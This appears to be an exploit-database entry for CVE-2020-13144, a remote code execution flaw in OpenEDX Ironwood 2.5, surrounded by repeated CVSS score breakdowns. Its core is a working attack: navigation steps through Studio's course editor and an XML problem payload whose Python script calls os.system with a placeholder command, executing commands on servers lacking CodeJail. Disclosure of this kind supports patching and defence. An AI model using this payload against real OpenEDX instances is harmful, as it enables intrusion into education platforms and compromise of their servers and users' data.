9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
OpenEDX platform Ironwood version 2.5 suffers from a remote code execution vulnerability.
# Exploit Title: OpenEDX platform Ironwood 2.5 - Remote Code Execution
# Google Dork: N/A
# Date: 2020-05-20
# Exploit Author: Daniel MonzΓ³n (stark0de)
# Vendor Homepage: https://open.edx.org/
# Software Link: https://github.com/edx/edx-platform
# Version: Ironwood 2.5
# Tested on: Debian x64
# CVE : CVE-2020-13144
CVE ID: CVE-2020-13144
OpenEDX Platform Ironwood version 2.5 suffers from a RCE vulnerability when the use of CodeJail (https://github.com/edx/codejail) is not enforced
This is an authenticated vulnerability, so you need to register an account, go to /edx-studio
Then Create New course > New section > New subsection > New unit > Add new component > Problem button > Advanced tab > Custom Python evaluated code
Once here we just need to edit the problem and introduce a payload such as:
<problem>
<script type="python">
def test_add(expect,ans):
import os
os.system("thecommandyouwanttoexecute")
</script>
<p>Problem text</p>
<customresponse cfn="test_add" expect="20">
<textline size="10" correct_answer="11" label="Integer #1"/><br/>
<textline size="10" correct_answer="9" label="Integer #2"/>
</customresponse>
<solution>
<div class="detailed-solution">
<p>Solution or Explanation Heading</p>
<p>Solution or explanation text</p>
</div>
</solution>
</problem>
And click Submit, and you will execute commands in the machine
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P